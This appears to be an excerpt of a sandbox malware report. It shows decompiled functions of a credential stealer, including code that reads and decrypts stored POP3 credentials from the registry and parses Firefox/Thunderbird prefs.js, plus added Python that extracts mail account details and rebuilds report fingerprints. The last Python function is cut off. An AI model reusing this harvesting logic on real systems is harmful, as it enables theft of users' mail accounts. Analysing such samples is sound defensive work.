				_t39 = GetSystemMetrics(0x10);                                // 0x10 = SM_CXFULLSCREEN (screen width)
				if(_t35 == 0 || _t39 == 0) {                                  // fallback: query the desktop DC
					_t19 = GetDC(0);
					_v12 = _t19;
					_t39 = GetDeviceCaps(_t19, 8);                            // 8 = HORZRES
					_t35 = GetDeviceCaps(_v12, 0xa);                          // 0xa = VERTRES
					ReleaseDC(0, _v12);
				}
				GetWindowRect(_a4,  &_v28);
				_t45 = _v28.right;
				_t40 = _v28.bottom;
				asm("cdq");                                                   // sign extension for a signed divide by two:
				asm("cdq");                                                   // "cdq; sub eax, edx; sar eax, 1" surfaces below as "- _t38 >> 1"
				_t32 = _v28.top - _t40 + _t35 - 1 - _t38;                      // screen height - window height (minus the sign bit from cdq)
				_t37 = _v28.left - _t45 + _t39 - 1 - _t38 >> 1;                // x = (screen width - window width) / 2
				_t33 = _t32 >> 1;                                              // y = (screen height - window height) / 2
				if(_t32 < 0) {                                                 // clamp: window taller than the screen
					_t33 = 0;
				}
				if(_t37 < 0) {                                                 // clamp: window wider than the screen
					_t37 = 0;
				}
				return MoveWindow(_a4, _t37, _t33, _t45 - _v28.left + 1, _t40 - _v28.top + 1, 1);  // keep the current size (right/bottom treated as inclusive); bRepaint = TRUE
			}

                                                                                                                                                                   Disassembly listing (instruction text not captured in this extraction): 0x0040649b - 0x00406540

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 004064AC
                                                                                                                                                                  • GetSystemMetrics.USER32 ref: 004064B2
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004064C0
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064D2
                                                                                                                                                                  • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 004064DB
                                                                                                                                                                  • ReleaseDC.USER32 ref: 004064E4
                                                                                                                                                                  • GetWindowRect.USER32 ref: 004064F1
                                                                                                                                                                  • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00406536
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1999381814-0
                                                                                                                                                                  • Opcode ID: 49d5a035e180b7af43cac72741eab6a6786db33261f0c5654e3a6ca50601d200
                                                                                                                                                                  • Instruction ID: ba7d715333d017d2103329686637bd52cca5eef1020c3fd7483cce7c10731540
                                                                                                                                                                  • Opcode Fuzzy Hash: 49d5a035e180b7af43cac72741eab6a6786db33261f0c5654e3a6ca50601d200
                                                                                                                                                                  • Instruction Fuzzy Hash: 1011A232A00219AFDF109FB8DC09BEF7FB9EB44351F054135EE06E3290DA70A9418A90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                   			// Copies the NUL-terminated ANSI string _a4 to the clipboard as CF_TEXT.
                                                                                                                                                                   			// OpenClipboard is not called here, so the caller must already own the
                                                                                                                                                                   			// clipboard; this routine only empties it, stores the text and closes it.
                                                                                                                                                                   			// Returns 1 if SetClipboardData succeeded, otherwise 0.
                                                                                                                                                                   			E00406073(void* _a4) {
                                                                                                                                                                   				signed int _t11;
                                                                                                                                                                   				int _t13;
                                                                                                                                                                   				void* _t17;
                                                                                                                                                                   				signed int _t19;
                                                                                                                                                                   				void* _t22;
                                                                                                                                                                   
                                                                                                                                                                   				_t22 = _a4;
                                                                                                                                                                   				_t19 = 0;
                                                                                                                                                                   				EmptyClipboard();
                                                                                                                                                                   				if(_t22 != 0) {
                                                                                                                                                                   					_t2 = strlen(_t22) + 1; // 0x1, length including the terminating NUL
                                                                                                                                                                   					_t13 = _t2;
                                                                                                                                                                   					_t17 = GlobalAlloc(0x2000, _t13); // 0x2000 == GMEM_DDESHARE
                                                                                                                                                                   					if(_t17 != 0) {
                                                                                                                                                                   						memcpy(GlobalLock(_t17), _t22, _t13);
                                                                                                                                                                   						GlobalUnlock(_t17);
                                                                                                                                                                   						_t11 = SetClipboardData(1, _t17); // 1 == CF_TEXT; ownership of _t17 passes to the clipboard
                                                                                                                                                                   						asm("sbb esi, esi");
                                                                                                                                                                   						_t19 =  ~( ~_t11); // normalise the returned handle to 1 (non-NULL) or 0 (NULL)
                                                                                                                                                                   					}
                                                                                                                                                                   				}
                                                                                                                                                                   				CloseClipboard();
                                                                                                                                                                   				return _t19;
                                                                                                                                                                   			}

                                                                                                                                                                   Disassembly listing (instruction text not captured in this extraction): 0x00406074 - 0x004060d9

                                                                                                                                                                  APIs
                                                                                                                                                                  • EmptyClipboard.USER32(?,?,0040AFC1,?), ref: 0040607B
                                                                                                                                                                  • strlen.MSVCRT ref: 00406088
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AFC1,?), ref: 00406097
                                                                                                                                                                  • GlobalLock.KERNEL32 ref: 004060A4
                                                                                                                                                                  • memcpy.MSVCRT ref: 004060AD
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004060B6
                                                                                                                                                                  • SetClipboardData.USER32 ref: 004060BF
                                                                                                                                                                  • CloseClipboard.USER32(?,?,0040AFC1,?), ref: 004060CF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3116012682-0
                                                                                                                                                                  • Opcode ID: c70b900a696f57a29a369809a0454994a779be389cf8b88d1f6a35ab18b15240
                                                                                                                                                                  • Instruction ID: d09f43d2fefddb7d7ea69405cde3b0bd2fff4912bca4764858ce7f0ae225efb5
                                                                                                                                                                  • Opcode Fuzzy Hash: c70b900a696f57a29a369809a0454994a779be389cf8b88d1f6a35ab18b15240
                                                                                                                                                                  • Instruction Fuzzy Hash: 09F090371402296BC2102FA4BC4CE9B7FACDF88B56B058139FA0AD2251DE74894486A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
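
The next listing, E0040C70B, walks a buffer line by line and keeps only lines that start with the 11-byte prefix user_pref(" (the 0xb it subtracts), which is the format of the Mozilla prefs.js file used by Firefox and Thunderbird. The Python below is an added illustration written for this report, not code from the sample and not Joe Sandbox output: it reimplements that line filter and goes further than the decompiled fragment by also parsing the preference name and value, so a responder can see what a prefs.js read gives a credential stealer (for Thunderbird, the mail.server.* keys hold account host names and user names). The function names parse_prefs and mail_servers are my own, and the prefs.js lines are constructed for the example.

```python
import re
from typing import Dict, Union

# The same 11-byte prefix the decompiled loop tests for (0xb == strlen('user_pref("')).
PREFIX = 'user_pref("'

# Constructed sample input in prefs.js format; not taken from the analysed sample.
# The mail.server.* keys follow Thunderbird's account naming (assumption for the demo).
SAMPLE_PREFS_JS = r'''# Mozilla User Preferences
user_pref("app.update.auto", false);
user_pref("browser.startup.homepage", "https://example.test/");
user_pref("mail.server.server1.hostname", "imap.example.test");
user_pref("mail.server.server1.userName", "alice@example.test");
user_pref("mail.server.server1.type", "imap");
user_pref("mail.server.server1.port", 993);
user_pref("signon.rememberSignons", true);
user_pref("weird.key", "quoted \"inside\" value");
// a comment line that the filter must skip
pref("not.a.user.pref", 1);
'''

# user_pref("<name>", <value>);  name and string values may contain backslash escapes.
_LINE_RE = re.compile(r'^user_pref\("((?:[^"\\]|\\.)*)"\s*,\s*(.*?)\s*\);\s*$')
_STR_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"$')

PrefValue = Union[str, int, bool]


def _unescape(s: str) -> str:
    """Resolve the JavaScript-style backslash escapes used inside prefs.js strings."""
    return re.sub(r'\\(.)', r'\1', s)


def parse_prefs(text: str) -> Dict[str, PrefValue]:
    """Return {name: value} for every well-formed user_pref line in the buffer."""
    prefs: Dict[str, PrefValue] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith(PREFIX):   # same cheap filter as the decompiled loop
            continue
        m = _LINE_RE.match(line)
        if not m:                         # malformed entry: ignore rather than guess
            continue
        name, value = _unescape(m.group(1)), m.group(2)
        sm = _STR_RE.match(value)
        if sm:
            prefs[name] = _unescape(sm.group(1))
        elif value in ("true", "false"):
            prefs[name] = value == "true"
        else:
            try:
                prefs[name] = int(value)
            except ValueError:
                prefs[name] = value        # keep unknown literal forms verbatim
    return prefs


def mail_servers(prefs: Dict[str, PrefValue]) -> Dict[str, Dict[str, PrefValue]]:
    """Group mail.server.<id>.<attr> entries per server id, the data a mail
    password recovery routine would pair with the stored credentials."""
    servers: Dict[str, Dict[str, PrefValue]] = {}
    for key, value in prefs.items():
        parts = key.split(".")
        if len(parts) == 4 and parts[:2] == ["mail", "server"]:
            servers.setdefault(parts[2], {})[parts[3]] = value
    return servers


if __name__ == "__main__":
    parsed = parse_prefs(SAMPLE_PREFS_JS)
    for server_id, attrs in mail_servers(parsed).items():
        print(server_id, attrs)
```

Note that prefs.js itself never contains passwords; Mozilla keeps those in the signon store alongside it. What the file does give an attacker is the account inventory (host, protocol, port, user name) needed to make the recovered secrets usable, which is why a stealer bothers to parse it at all.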

                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                   			// Scans the data obtained through E0040692F for Mozilla preference entries,
                                                                                                                                                                   			// i.e. lines beginning with user_pref(" (the prefs.js format of Firefox and
                                                                                                                                                                   			// Thunderbird). The string constants at 0x413b10 / 0x413b18 are not resolved
                                                                                                                                                                   			// in this dump, and _t61 / _t92 are decompiler artefacts of the unresolved calls.
                                                                                                                                                                   			E0040C70B(void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				void _v1029;
                                                                                                                                                                  				void _v1039;
                                                                                                                                                                  				char _v1040;
                                                                                                                                                                  				void _v2063;
                                                                                                                                                                  				void _v2064;
                                                                                                                                                                  				void _v3087;
                                                                                                                                                                  				void _v3088;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				intOrPtr _t53;
                                                                                                                                                                  				void* _t54;
                                                                                                                                                                  				void* _t56;
                                                                                                                                                                  				void* _t59;
                                                                                                                                                                  				void* _t60;
                                                                                                                                                                  				void* _t67;
                                                                                                                                                                  				void* _t68;
                                                                                                                                                                  				void* _t73;
                                                                                                                                                                  				void* _t85;
                                                                                                                                                                  				int _t86;
                                                                                                                                                                  				void* _t106;
                                                                                                                                                                  				int _t107;
                                                                                                                                                                  				int _t111;
                                                                                                                                                                  				void* _t114;
                                                                                                                                                                  				void* _t115;
                                                                                                                                                                  				void* _t116;
                                                                                                                                                                  
                                                                                                                                                                  				_v1040 = 0;
                                                                                                                                                                  				memset( &_v1039, 0, 0x3ff);
                                                                                                                                                                  				_v3088 = 0;
                                                                                                                                                                  				memset( &_v3087, 0, 0x3ff);
                                                                                                                                                                  				_v2064 = 0;
                                                                                                                                                                  				memset( &_v2063, 0, 0x3ff);
                                                                                                                                                                  				_t116 = _t115 + 0x24;
                                                                                                                                                                  				_t53 = E00406BA3(_a4 + 4);
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = _t53;
                                                                                                                                                                  				_t54 = E0040692F(_t53,  &_v1040,  &_v1040,  &_v12);
                                                                                                                                                                  				if(_t54 != 0) {
                                                                                                                                                                  					do {
                                                                                                                                                                   						_t56 = E00406A01(0, "user_pref(\""); // non-zero: not a user_pref line, skip it
                                                                                                                                                                  						_pop(_t92);
                                                                                                                                                                  						if(_t56 != 0) {
                                                                                                                                                                  							goto L10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push(0x413b10);
                                                                                                                                                                   						_t60 = 0xb; // 0xb == strlen("user_pref(\"")
                                                                                                                                                                   						_t14 = E00406A01(_t60) - 0xb; // -11: length remaining after the 11-byte prefix
                                                                                                                                                                  						_t92 = _t14;
                                                                                                                                                                  						_v8 = _t92;
                                                                                                                                                                  						if(_t92 <= 0) {
                                                                                                                                                                  							goto L10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t85 = E00406A01(_t61 + 1, 0x413b18);
                                                                                                                                                                  						_t17 = _t85 + 1; // 0x1
                                                                                                                                                                  						_t106 = E00406A01(_t17, 0x413b10);
                                                                                                                                                                  						if(_t106 <= 0) {
                                                                                                                                                                  							_t28 = _t85 + 1; // 0x1
                                                                                                                                                                  							_t67 = E00406A01(_t28, ")");
                                                                                                                                                                  							_pop(_t92);
                                                                                                                                                                  							_t68 = 0xfffffffe;
                                                                                                                                                                  							_t111 = _t67 + _t68 - _t85;
                                                                                                                                                                  							if(_t111 <= 0) {
                                                                                                                                                                  								goto L10;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t107 = _v8;
                                                                                                                                                                  							memcpy( &_v3088,  &_v1029, _t107);
                                                                                                                                                                  							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
                                                                                                                                                                  							_t73 = _t114 + _t85 - 0x40a;
                                                                                                                                                                  							L9:
                                                                                                                                                                  							memcpy( &_v2064, _t73, _t111);
                                                                                                                                                                  							_t92 = _a4;
                                                                                                                                                                  							_t116 = _t116 + 0x18;
                                                                                                                                                                  							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
                                                                                                                                                                  							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
                                                                                                                                                                  							if(_t59 == 0) {
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t20 = _t106 + 1; // 0x1
                                                                                                                                                                  						_t111 = E00406A01(_t20, 0x413b10) - _t106 - 1;
                                                                                                                                                                  						_pop(_t92);
                                                                                                                                                                  						if(_t111 <= 0) {
                                                                                                                                                                  							goto L10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t86 = _v8;
                                                                                                                                                                  						memcpy( &_v3088,  &_v1029, _t86);
                                                                                                                                                                  						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
                                                                                                                                                                  						_t73 = _t114 + _t106 - 0x40b;
                                                                                                                                                                  						goto L9;
                                                                                                                                                                  						L10:
                                                                                                                                                                  						_t59 = E0040692F(_v16, _t92,  &_v1040,  &_v12);
                                                                                                                                                                  					} while (_t59 != 0);
                                                                                                                                                                  					return _t59;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t54;
                                                                                                                                                                  			}

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memcpymemset$strlen$_memicmp
• String ID: user_pref("
• API String ID: 765841271-2487180061
• Opcode ID: b6f81e50d3f8e97912bf56328f9eb2e236efc4b8b3b87e64c123cb08f78c772a
• Instruction ID: c71e9d7c33fd880144b5893e014edb1d15ca38a86f0d2a268660e68eb467e50f
• Opcode Fuzzy Hash: b6f81e50d3f8e97912bf56328f9eb2e236efc4b8b3b87e64c123cb08f78c772a
• Instruction Fuzzy Hash: 134168769041199ADB14EB95DCC0EDA77AC9F44314F1083BBE605F7181EA389F49CF68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 61%
			E004055A9(intOrPtr _a4) {
				struct HWND__* _v12;
				signed int _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v48;
				char* _v52;
				void* _v64;
				void _v319;
				char _v320;
				struct HWND__* _t53;
				intOrPtr* _t59;
				void* _t61;
				intOrPtr _t66;
				void* _t74;
				void* _t80;
				intOrPtr _t81;
				void* _t84;
				intOrPtr _t89;
				short _t91;
				signed int _t94;
				short* _t95;
				void* _t96;
				void* _t97;

				_t89 = _a4;
				_t53 = GetDlgItem(*(_t89 + 4), 0x3e9);
				_v12 = _t53;
				SendMessageA(_t53, 0x1009, 0, 0);
				SendMessageA(_v12, 0x1036, 0, 0x26);
				do {
				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v12);
				_t80 = 6;
				E0040492F(0x41344f, _t80);
				_t59 = *((intOrPtr*)(_t89 + 0xc));
				_t81 = *((intOrPtr*)(_t59 + 4));
				_t97 = _t96 + 0x10;
				_v32 = _t81;
				_v28 = *_t59;
				_v20 = 0;
				if(_t81 <= 0) {
					L10:
					_t61 = 2;
                                                                                                                                                                  					E004048C0(_t61, _v12, 0, _t61);
                                                                                                                                                                  					return SetFocus(_v12);
                                                                                                                                                                  				} else {
                                                                                                                                                                  					goto L3;
                                                                                                                                                                  				}
                                                                                                                                                                  				do {
                                                                                                                                                                  					L3:
                                                                                                                                                                  					_v16 = 0;
                                                                                                                                                                  					_v24 = 0;
                                                                                                                                                                  					do {
                                                                                                                                                                  						_t94 = _v16 << 2;
                                                                                                                                                                  						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
                                                                                                                                                                   							_v320 = 0;
                                                                                                                                                                   							memset( &_v319, 0, 0xff);          // 256-byte text buffer for the column header
                                                                                                                                                                   							_t97 = _t97 + 0xc;
                                                                                                                                                                   							_v52 =  &_v320;                    // LVCOLUMN.pszText
                                                                                                                                                                   							_v64 = 4;                          // LVCOLUMN.mask = LVCF_TEXT
                                                                                                                                                                   							_v48 = 0xff;                       // LVCOLUMN.cchTextMax
                                                                                                                                                                   							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) { // LVM_GETCOLUMNA: copy column _v16 header text from the source list
                                                                                                                                                                  								_push(_v16);
                                                                                                                                                                  								_push(0);
                                                                                                                                                                  								_push(_v12);
                                                                                                                                                                  								_t84 = 5;
                                                                                                                                                                  								_t74 = E00404978( &_v320, _t84);
                                                                                                                                                                  								_t95 = _t94 + _v28;
                                                                                                                                                                  								_t91 =  *_t95;
                                                                                                                                                                  								E00404CF3(_v12, _t74, 0 | _t91 > 0x00000000);
                                                                                                                                                                  								_t97 = _t97 + 0x18;
                                                                                                                                                                  								if(_t91 == 0) {
                                                                                                                                                                  									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						_v16 = _v16 + 1;
                                                                                                                                                                  						_t66 = _v32;
                                                                                                                                                                  						_v24 = _v24 + 0x14;
                                                                                                                                                                  					} while (_v16 < _t66);
                                                                                                                                                                  					_v20 = _v20 + 1;
                                                                                                                                                                  				} while (_v20 < _t66);
                                                                                                                                                                  				goto L10;
                                                                                                                                                                  			}

                                                                                                                                                                   Disassembly listing for the function above: only the address column survived extraction (0x004055b5 .. 0x0040571c, loop body at 0x0040562b .. 0x004056f6); the instruction text is not preserved on this page.


                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4281309102-0
                                                                                                                                                                  • Opcode ID: b2ff56cee8ee5384e194c9e88251dfd2c05582b0ec5024aa31fc40173aaba44b
                                                                                                                                                                  • Instruction ID: 7cc6a8daf3229b7d8e0d7717536759f0385f0427a9067e31b35bb84d252c6e93
                                                                                                                                                                  • Opcode Fuzzy Hash: b2ff56cee8ee5384e194c9e88251dfd2c05582b0ec5024aa31fc40173aaba44b
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D414BB5D00109BFDB209F98DC85DAEBBB9EF04358F00846AE914B7291D7759E50CF94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E004071D6(void* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				short* _v16;
                                                                                                                                                                  				unsigned int _v20;
                                                                                                                                                                  				char* _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				char _v288;
                                                                                                                                                                  				char _v544;
                                                                                                                                                                  				char _v800;
                                                                                                                                                                  				char _v1056;
                                                                                                                                                                  				char _v1584;
                                                                                                                                                                  				void _v2607;
                                                                                                                                                                  				char _v2608;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t36;
                                                                                                                                                                  				void* _t63;
                                                                                                                                                                  				char* _t66;
                                                                                                                                                                  				void* _t68;
                                                                                                                                                                  
                                                                                                                                                                  				_t63 = __ecx;
                                                                                                                                                                   				_v2608 = 0;
                                                                                                                                                                   				memset( &_v2607, 0, 0x3ff);               // 1024-byte receive buffer, zeroed
                                                                                                                                                                   				_v12 = 0x400;                             // in/out buffer size handed to the reader
                                                                                                                                                                   				_v1056 = 0;
                                                                                                                                                                   				_v800 = 0;
                                                                                                                                                                   				_v544 = 0;
                                                                                                                                                                   				_v288 = 0;
                                                                                                                                                                   				_t36 = E0040F214(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12); // read the stored "POP3_credentials" value (reader body not in this excerpt); non-zero return means not found or error
                                                                                                                                                                  				_t72 = _t36;
                                                                                                                                                                  				if(_t36 != 0) {
                                                                                                                                                                  					return _t36;
                                                                                                                                                                  				}
                                                                                                                                                                   				_t67 =  &_v1584;
                                                                                                                                                                   				E004046E1( &_v1584);                      // initialise the decode context (body not in this excerpt)
                                                                                                                                                                   				if(E004047AA( &_v1584, _t72) != 0) {
                                                                                                                                                                   					_v24 =  &_v2608;                     // {_v28 = length, _v24 = pointer}: the raw value as a size/pointer pair
                                                                                                                                                                   					_v28 = _v12;
                                                                                                                                                                   					if(E0040481B(_t67,  &_v28, 0,  &_v20) != 0) { // output: wide string _v16 with byte length _v20; the LocalFree below is the CryptUnprotectData contract, but the helper is not resolved on this page
                                                                                                                                                                   						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16, _v20 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0; // UTF-16 -> ANSI into _v544 (max 0xfd bytes), then NUL-terminate at the returned length
                                                                                                                                                                   						LocalFree(_v16);
                                                                                                                                                                   						E0040F1F1(0xff, _t63, _a8, "POP3_name",  &_v800); // account name
                                                                                                                                                                   						E0040F1F1(0xff, _t63, _a8, "POP3_host",  &_v288); // mail server host
                                                                                                                                                                   						_t66 =  &_v1056;
                                                                                                                                                                   						E004060DA(0xff, _t66, _a12);
                                                                                                                                                                   						 *((intOrPtr*)( *_a4))(_t66);        // hand the assembled record to the caller's callback (vtable slot 0 of _a4)
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return E004047FB( &_v1584);
			}

Instruction addresses for the listing above, in line order: 0x004071d6, 0x004071f1, 0x004071f7, 0x0040720f, 0x00407216, 0x0040721c, 0x00407222, 0x00407228, 0x0040722e, 0x00407236, 0x00407238, 0x00407303, 0x00407303, 0x0040723e, 0x00407244, 0x00407250, 0x0040725c, 0x00407262, 0x00407277, 0x0040729b, 0x004072a2, 0x004072be, 0x004072d4, 0x004072dc, 0x004072e2, 0x004072f2, 0x004072f2, 0x00407277, 0x00000000

APIs
• memset.MSVCRT ref: 004071F7
  • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
  • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
  • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
  • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,0040738B,?,000000FD,00000000,00000000,?,00000000,0040738B,?,?,?,?,00000000), ref: 00407292
• LocalFree.KERNEL32(?,?,?,?,?,00000000,7479ED80,?), ref: 004072A2
  • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
  • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
  • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
• String ID: POP3_credentials$POP3_host$POP3_name
• API String ID: 604216836-2190619648
• Opcode ID: ad9c5c80b0256c337c12dec900ec01b57eb9c2969be2bde46c98a81af137ee1a
• Instruction ID: 7a8ee4d7bc4178ad58e78f2f27b608862355488638afca077fa6fa925b8dfb39
• Opcode Fuzzy Hash: ad9c5c80b0256c337c12dec900ec01b57eb9c2969be2bde46c98a81af137ee1a
• Instruction Fuzzy Hash: D8315075A4025DAFCB11EB69CC81ADE7BBCEB59344F0080B6FA04B3141D6349F598F65
Uniqueness

Uniqueness Score: -1.00%
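The Similarity block above fingerprints the function by its API usage (API ID) and its referenced strings (String ID), which is what lets the same credential-harvesting routine be recognised in other samples even when it is re-packed. The following Python is an added example, not Joe Sandbox code: it reconstructs both IDs from the APIs block and the string list of the listing above. The rules it applies are inferred from this page's values alone and are assumptions (CamelCase splitting with tokens shorter than four characters dropped, tokens grouped by how many listed calls contain them and joined with `$`, strings sorted and joined with `$`); they reproduce the two IDs printed above but are not documented by the vendor. The numeric API String ID is not reconstructed because the page does not say how it is derived.

```python
"""Reconstruct Joe Sandbox-style function fingerprints from a report's
"APIs" block and string list.

Added example, not Joe Sandbox code. The tokenisation and grouping rules are
inferred from the values printed on this page and are assumptions; they
reproduce this page's API ID and String ID but are not vendor-documented.
"""
import re
from collections import Counter, defaultdict

# Sample input: the "APIs" block of the function listed at 0x004071d6 on this
# page, copied verbatim (bullets and "Part of subcall function" lines included).
REPORT_APIS = """\
• memset.MSVCRT ref: 004071F7
  • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
  • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
  • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
  • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,0040738B,?,000000FD,00000000,00000000,?,00000000,0040738B,?,?,?,?,00000000), ref: 00407292
• LocalFree.KERNEL32(?,?,?,?,?,00000000,7479ED80,?), ref: 004072A2
  • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
  • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
  • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
"""
# The three strings the page attributes to the same function.
REPORT_STRINGS = ["POP3_name", "POP3_host", "POP3_credentials"]

# One API per bullet: "Name.MODULE", optionally followed by an argument list
# and a "ref:" tail, optionally prefixed by "Part of subcall function XXXX:".
_API_LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z_]\w*\.[A-Za-z0-9]+)"
)
# CamelCase words ("WideCharToMultiByte" -> Wide, Char, To, Multi, Byte) or a
# whole lowercase CRT name ("memset").
_TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z][a-z0-9]*")
# Assumption inferred from this page: Get, Reg, To, Ex and the A/W suffix never
# appear in the printed API ID, so tokens shorter than four characters are dropped.
MIN_TOKEN_LEN = 4


def parse_api_lines(block: str) -> list[str]:
    """Return the Name.MODULE entries of an "APIs" block, in report order."""
    return [m.group(1) for m in _API_LINE_RE.finditer(block)]


def api_tokens(api: str) -> list[str]:
    """Tokens of one API name, module suffix and short tokens removed."""
    name = api.split(".", 1)[0]
    return [t for t in _TOKEN_RE.findall(name) if len(t) >= MIN_TOKEN_LEN]


def api_id(apis: list[str]) -> str:
    """Tokens grouped by how many listed calls contain them (most frequent
    first); each group sorted and concatenated, groups joined with '$'."""
    counts = Counter(t for a in apis for t in api_tokens(a))
    groups: dict[int, list[str]] = defaultdict(list)
    for tok, n in counts.items():
        groups[n].append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def string_id(strings: list[str]) -> str:
    """Distinct strings, sorted, joined with '$'."""
    return "$".join(sorted(set(strings)))


def token_similarity(apis_a: list[str], apis_b: list[str]) -> float:
    """Jaccard similarity of the two token sets; 1.0 means identical API usage."""
    a = {t for x in apis_a for t in api_tokens(x)}
    b = {t for x in apis_b for t in api_tokens(x)}
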